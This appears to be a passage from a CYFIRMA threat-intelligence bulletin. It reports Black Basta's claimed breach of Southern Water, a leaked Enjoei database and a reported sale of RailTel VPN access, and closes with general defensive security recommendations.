The Black Basta ransomware gang claimed to have hacked the UK water utility, Southern Water, a major player in the UK water industry. Southern Water is a private utility company responsible for collecting and treating wastewater in Hampshire, the Isle of Wight, West Sussex, East Sussex, and Kent, and for providing public water supply to approximately half of this area. The company is a major player in the UK water industry, it employs over 6,000 people and has an annual turnover of over £1 billion. It is committed to providing its customers with high-quality water and wastewater services. The Black Basta ransomware group added Southern Water to the list of victims on its Tor data leak site and threatened to leak the stolen data on February 29, 2024. The group claims to have stolen 750 gigabytes of sensitive data, including users’ personal documents and corporate documents. The gang published some screenshots as proof of the attack, including passports, ID cards, and personal information of some employees.

Relevancy & Insights:
Since April 2022, the Black Basta ransomware group has remained active, employing a double-extortion attack model common to other ransomware operations. This malicious entity utilizes various deployment methods, including the use of Cobalt Strike or similar frameworks, as well as leveraging email phishing techniques. Notably, Black Basta is frequently introduced as a secondary infection, with instances observed following a Qakbot infection, underscoring the sophistication and adaptability of its attack vectors.

ETLM Assessment:
Black Basta, a ransomware group that operates primarily in the Russian-speaking domain, has gained notoriety for its attacks on various industries. This malicious group, known for deploying the Black Basta ransomware, has demonstrated a propensity to target a diverse array of sectors, including healthcare, government, financial services, education, and media. According to assessments by CYFIRMA, there is a significant likelihood that Black Basta will persist in its efforts to compromise companies on a global scale, aiming to secure substantial financial gains through their ransomware activities.

Data Leaks

ENJOEI Advertised in Leak Site

  • Attack Type: Data Leaks
  • Target Industry: Retail
  • Target Geography: Brazil
  • Objective: Data Theft, Financial Gains
  • Business Impact: Data Loss, Reputational Damage

CYFIRMA Research team observed a potential data leak related to ENJOEI, {www[.]enjoei[.]com[.]br}. Enjoei is a leading fashion marketplace in Brazil, which sells both used and new clothing products and accessories. The offered database comprises sensitive information, encompassing details of customers, sellers, products, and other confidential data. The total size of the database available for sale is 3.2 terabytes.

Source: Underground forums

Relevancy & Insights:
Cybercriminals with financial motivations frequently exploit exposed and vulnerable systems and applications. A significant number of these individuals engage in covert discussions within online forums dedicated to illegal activities, where they trade stolen digital assets. In contrast to certain financially driven groups such as ransomware or extortion gangs that boast about their exploits, these opportunistic attackers choose a more discreet approach. They capitalize on unpatched systems and vulnerabilities in applications to illicitly access and abscond with valuable data. Following the theft, they promote the pilfered data for sale within clandestine forums, where it may be further circulated and repurposed by other malicious actors in their nefarious endeavors.

ETLM Assessment:
MarquesAGS; an emerging threat actor based in Brazil, concentrates on targeting organizations within the country. As per CYFIRMA’s assessment, organizations in Brazil lacking sufficient security measures are identified as potential targets for this specific threat actor.

Other Observations

CYFIRMA Research team observed a potential sale of Network and VPN access related to RailTel Corporation of India Ltd, {www[.]railtel[.]in}. RailTel Corporation of India Ltd. is an Indian public sector enterprise that provides broadband and VPN services. RailTel was formed in September 2000 to create a nationwide broadband, telecom, and multimedia network, and to modernize the train control operation and safety system of Indian Railways. RailTel’s network passes through around 5,000 stations across the country, covering all major commercial centre sites. The threat actor is attempting to sell unauthorized access to RailTel’s VPN and network infrastructure.

Source: Underground forums


  • Attack Surface Management should be adopted by organizations, ensuring that a continuous closed-loop process is created between attack surface monitoring and security testing.
  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Incorporate Digital Risk Protection (DRP) in the overall security posture that acts as a proactive defence against external threats targeting unsuspecting customers.
  • Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, active network monitoring, through next generation security solutions and ready to go incident response plan.
  • Create risk-based vulnerability management with deep knowledge about each asset. Assign a triaged risk score based on the type of vulnerability and criticality of the asset to help ensure that the most severe and dangerous vulnerabilities are dealt with first.


  • Take advantage of global Cyber Intelligence providing valuable insights on threat actor activity, detection, and mitigation techniques.
  • Proactively monitor the effectiveness of risk-based information security strategy, the security controls applied and the proper implementation of security technologies, followed by corrective actions remediations, and lessons learned.
  • Move beyond the traditional model of security awareness towards improved simulation and training exercises that mimic real attack scenarios, account for behaviours that lead to a compromised, and are measured against real attacks the organization receives.
  • Consider implementing Network Traffic Analysis (NTA) and Network Detection and Response (NDR) security systems to compensate for the shortcoming of EDR and SIEM solutions.
  • Detection processes are tested to ensure awareness of anomalous events. Timely communication of anomalies and continuously evolved to keep up with refined ransomware threats.


  • Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed since vulnerabilities are one of the top attack vectors.
  • Consider using security automation to speed up threat detection, improved incident response, increased the visibility of security metrics, and rapid execution of security checklists.
  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthen defences based on tactical intelligence provided.
  • Deploy detection technologies that are behavioural anomaly-based to detect ransomware attacks and help to take appropriate measures.
  • Implement a combination of security control such as reCAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), Device fingerprinting, IP backlisting, Rate-limiting, and Account lockout to thwart automated brute-force attacks.
  • Ensure email and web content filtering uses real-time blocklists, reputation services, and other similar mechanisms to avoid accepting content from known and potentially malicious sources.